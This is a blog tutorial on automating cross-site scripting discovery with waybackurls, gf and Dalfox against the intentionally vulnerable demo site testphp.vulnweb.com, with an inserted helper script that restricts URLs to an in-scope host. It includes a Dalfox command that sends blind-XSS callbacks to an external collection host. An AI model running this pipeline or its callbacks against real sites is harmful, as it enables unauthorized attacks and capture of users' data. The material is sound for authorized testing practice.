Automating XSS using Dalfox, GF and Waybackurls

Keshav Malik
Published in InfoSec Write-ups
Nov 15, 2020

Hello Everyone! 😄

Hope you all are good.

Automating stuff is always fun, so why not XSS? All you need is Go (Golang) installed on your machine and you are ready to go.

Check out the official updated guide on BugBlogs.

Pre-Requisites :

Workflow

  • After installing all of the above-mentioned tools, choose your target. Let's use "http://testphp.vulnweb.com/" for demonstration purposes.
  • Use Waybackurls to fetch URLs for the chosen target and save the output in a text file.
echo "testphp.vulnweb.com" | waybackurls | tee testphp.txt
  • Use GF patterns to pick out the URLs that may be vulnerable to XSS, and use sed to get the URLs ready for Dalfox.
cat testphp.txt | gf xss | sed 's/=.*/=/' | sed 's/URL: //' | tee testxss.txt
  • Time to fire up Dalfox and start finding XSS.
dalfox file testxss.txt -b tigv2.xss.ht pipe
  • Make sure you replace my blind XSS Hunter payload with your own.
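A note on the sed step, with an added example that is not the author's script: `s/=.*/=/` cuts everything after the first `=`, so a URL with several parameters keeps only the first one, and archived URLs can include hosts other than the one you chose. The function below (the name `prep_urls` and the sample URLs are constructed for illustration) keeps only URLs on the single host you are authorized to test, blanks every parameter value, and removes duplicates.

```bash
#!/usr/bin/env bash
# Added example, not the author's script. prep_urls is a hypothetical helper.
# Usage: prep_urls SCOPE_HOST < urls.txt
#   1. keep only http(s) URLs whose host is exactly SCOPE_HOST
#   2. blank the value of every query parameter, not just the first
#   3. print each resulting URL once
prep_urls() {
  awk -v scope="$1" '
    {
      url = $0
      sub(/^URL: /, "", url)              # same cleanup as the second sed
      if (url !~ "^https?://") next
      host = url
      sub("^https?://", "", host)
      sub("[/?#].*$", "", host)           # keep the authority part only
      sub("^.*@", "", host)               # drop userinfo (user@host tricks)
      sub(":[0-9]+$", "", host)           # drop the port
      if (tolower(host) != tolower(scope)) next   # out of scope
      q = index(url, "?")
      if (q == 0) next                    # no parameters, nothing to test
      base  = substr(url, 1, q - 1)
      query = substr(url, q + 1)
      sub("#.*$", "", query)              # drop the fragment
      n = split(query, pairs, "&")
      out = ""
      for (i = 1; i <= n; i++) {
        name = pairs[i]
        sub("=.*$", "", name)             # keep the name, drop the value
        if (name == "") continue
        out = out (out == "" ? "" : "&") name "="
      }
      if (out == "") next
      line = base "?" out
      if (!(line in seen)) { seen[line] = 1; print line }
    }'
}

# Constructed sample input (not real scan output)
printf '%s\n' \
  'http://testphp.vulnweb.com/listproducts.php?cat=1&sort=asc' \
  'http://other.example/page.php?id=1' | prep_urls testphp.vulnweb.com
```

It can take the place of the two sed commands: `cat testphp.txt | gf xss | prep_urls testphp.vulnweb.com | tee testxss.txt`.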

Automating Workflow using bash

Check out the Bash Script to automate the workflow.

Hope you guys like this. Do give it a clap if you liked it. 👏

Do check out my BugBlogs for more amazing Writeups and Blogs: https://www.bugblogs.tech

Find me on:

LinkedIn: http://linkedin.com/in/keshav-malik/

Twitter: https://twitter.com/g0t_rOoT_